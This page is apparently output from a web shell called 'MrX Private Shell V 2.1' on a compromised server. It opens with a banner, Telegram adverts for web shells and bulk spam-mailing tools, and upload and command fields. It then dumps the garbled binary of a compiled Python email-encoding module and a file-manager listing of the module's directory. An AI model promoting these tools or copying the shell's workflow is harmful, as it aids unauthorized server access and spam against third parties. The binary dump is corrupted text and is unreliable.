__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
�

*�_i]!��4�SrSSKrSSKrSSKrSSKrSSKJrJr SSKJ	r	 /SQr
\R"\R"S5RS5rSr"S	S
\5r\"5rS\\"S5'S
rSrSrSrSr\\S.rSr\\S.r\\S.rSSjrg)z�Routines for manipulating RFC2047 encoded words.

This is currently a package-private API, but will be considered for promotion
to a public API if there is demand.

�N)�
ascii_letters�digits)�errors)�decode_q�encode_q�decode_b�encode_b�len_q�len_b�decode�encodes=([a-fA-F0-9]{2})c�f�[RURS5R55$)N�)�bytes�fromhex�groupr)�ms �+/usr/lib/python3.13/email/_encoded_words.py�<lambda>rAs��%�-�-�����
� 1� 1� 3�4�c�@�URSS5n[U5/4$)N�_� )�replace�_q_byte_subber)�encodeds rrrCs"���o�o�d�D�)�G��'�"�B�&�&rc�j�\rSrSrS\R
"S5-\R
"S5-rSrSr	g)�	_QByteMap�Is-!*+/�asciic�p�XR;a[U5X'X$SRU5X'X$)Nz={:02X})�safe�chr�format)�self�keys  r�__missing__�_QByteMap.__missing__Ms=���)�)���C��D�I��y��"�(�(��-�D�I��y�r�N)
�__name__�
__module__�__qualname__�__firstlineno__rr
rr"r'�__static_attributes__r)rrrrIs*���m�*�*�7�3�3�f�m�m�G�6L�L�D�rr�_� c�2�SRSU55$)N�c3�4# �UHn[Uv� M g7f�N)�_q_byte_map��.0�xs  r�	<genexpr>�encode_q.<locals>.<genexpr>Zs���3�7�a�;�q�>�7�s�)�join��bstrings rrrYs��
�7�7�3�7�3�3�3rc�&�[SU55$)Nc3�F# �UHn[[U5v� M g7fr4)�lenr5r6s  rr9�len_q.<locals>.<genexpr>]s���4�G�q�s�;�q�>�"�"�G�s�!)�sumr<s rr
r
\s���4�G�4�4�4rc�f�[U5S-nU(aSSSU-
OSn[R"X-SS9U(a[R"5/4$/4$![
Ra� [R"USS9[R"5/4s$![
Ra~ [R"US-SS9[R"5[R"5/4ss$![
Ra U[R"5/4sss$f=ff=ff=f)N�s===rT)�validateFs==)	r@�base64�	b64decoder�InvalidBase64PaddingDefect�binascii�Error�InvalidBase64CharactersDefect�InvalidBase64LengthDefect)r�pad_err�missing_paddings   rrrds5���'�l�Q��G�,3�f�Z�a��i�(��O�E����W�6��F�5<�V�
.�
.�
0�1�
�	
�BD�
�	
���>�>�E�	E�� � ��5�9��5�5�7�8��
���~�~�	E�
E��$�$�W�u�_�u�E��9�9�;��6�6�8�:����
�>�>�
E���!A�!A�!C� D�D�D�

E��	E��E�sZ�3A�A�D0�-*B�D0�D,�/AC5�0D,�1D0�5,D(�!D,�#D0�'D(�(D,�,D0c�L�[R"U5RS5$)Nr )rF�	b64encoderr<s rr	r	�s�����G�$�+�+�G�4�4rc�V�[[U5S5upUS-U(aS-$S-$)N�rDr)�divmodr@)r=�groups_of_3�leftovers   rrr�s.��"�3�w�<��3��K���?�8�a�3�3��3�3r)�q�bc�@�URS5upp4nURS5up!nUR5nURSS5n[U"U5upgURU5nX�XW4$![a? UR[R"SU<S355 URUS5nNL[[4aS URSS5nUR5S:wa*UR[R"SU<S	355 N�f=f)
a[Decode encoded word and return (string, charset, lang, defects) tuple.

An RFC 2047/2243 encoded word has the form:

    =?charset*lang?cte?encoded_string?=

where '*lang' may be omitted but the other parts may not be.

This function expects exactly such a string (that is, it does not check the
syntax and may raise errors if the string is not well formed), and returns
the encoded_string decoded first from its Content Transfer Encoding and
then from the resulting bytes into unicode using the specified charset.  If
the cte-decoded string does not successfully decode using the specified
character set, a defect is added to the defects list and the unknown octets
are replaced by the unicode 'unknown' character \uFDFF.

The specified charset and language are returned.  The default for language,
which is rarely if ever encountered, is the empty string.

�?�*r �surrogateescapez0Encoded word contains bytes not decodable using z charset�unknown-8bitzUnknown charset z* in encoded word; decoded as unknown bytes)
�split�	partition�lowerr
�
_cte_decodersr�UnicodeDecodeError�appendr�UndecodableBytesDefect�LookupError�UnicodeEncodeError�CharsetError)	�ewr/�charset�cte�
cte_string�langr=�defects�strings	         rrr�s%��*&(�X�X�c�]�"�A����(�(��-��G��

�)�)�+�C�����):�;�G�$�S�)�'�2��G�
?�����(���D�)�)���<����v�4�4�62�29��H�6F�G�	H�����):�;���+�,�?�����):�;���=�=�?�n�,��N�N�6�.�.�1A�'��M<�0=�>�
?��?�s�A3�3AD�;AD�Dc�
�US:XaURSS5nOURU5nUc*[S"U5n[S"U5nXV-
S:aSOSn[U"U5nU(aSU-nSRXX'5$)	a�Encode string using the CTE encoding that produces the shorter result.

Produces an RFC 2047/2243 encoded word of the form:

    =?charset*lang?cte?encoded_string?=

where '*lang' is omitted unless the 'lang' parameter is given a value.
Optional argument charset (defaults to utf-8) specifies the charset to use
to encode the string to binary before CTE encoding it.  Optional argument
'encoding' is the cte specifier for the encoding that should be used ('q'
or 'b'); if it is None (the default) the encoding which produces the
shortest encoded sequence is used, except that 'q' is preferred if it is up
to five characters longer.  Optional argument 'lang' (default '') gives the
RFC 2243 language string to specify in the encoded word.

r\r r[rVrW�rZz=?{}{}?{}?{}?=)r
�_cte_encode_length�
_cte_encodersr$)rmrh�encodingrkr=�qlen�blenrs        rr
r
�s���"�.� ��-�-��):�;���-�-��(����!�#�&�w�/��!�#�&�w�/���+��/�3�s���H�%�g�.�G���T�z���"�"�7�(�D�Dr)zutf-8Nr2)�__doc__�rerFrI�	functoolsrmrr�emailr�__all__�partial�compile�subrr�dictrr5�ordrr
rr	rr`rrqrpr
r)rr�<module>rs����R
�
���(��
���"�"�2�:�:�.C�#D�#H�#H�4�6��'�	��	��k����C��H��4�5�$E�L5�4�
�	��
�
'*�V
�	��
�
�	���
Er

Filemanager

Name Type Size Permission Actions
__init__.cpython-313.pyc File 1.84 KB 0644
_encoded_words.cpython-313.pyc File 8.09 KB 0644
_header_value_parser.cpython-313.pyc File 133.51 KB 0644
_parseaddr.cpython-313.pyc File 23.01 KB 0644
_policybase.cpython-313.pyc File 17.55 KB 0644
base64mime.cpython-313.pyc File 3.88 KB 0644
charset.cpython-313.pyc File 14.55 KB 0644
contentmanager.cpython-313.pyc File 12.1 KB 0644
encoders.cpython-313.pyc File 2 KB 0644
errors.cpython-313.pyc File 7.4 KB 0644
feedparser.cpython-313.pyc File 20.08 KB 0644
generator.cpython-313.pyc File 20.14 KB 0644
header.cpython-313.pyc File 24.03 KB 0644
headerregistry.cpython-313.pyc File 30.67 KB 0644
iterators.cpython-313.pyc File 2.75 KB 0644
message.cpython-313.pyc File 50.57 KB 0644
parser.cpython-313.pyc File 6.36 KB 0644
policy.cpython-313.pyc File 11.14 KB 0644
quoprimime.cpython-313.pyc File 9.68 KB 0644
utils.cpython-313.pyc File 15.72 KB 0644
Filemanager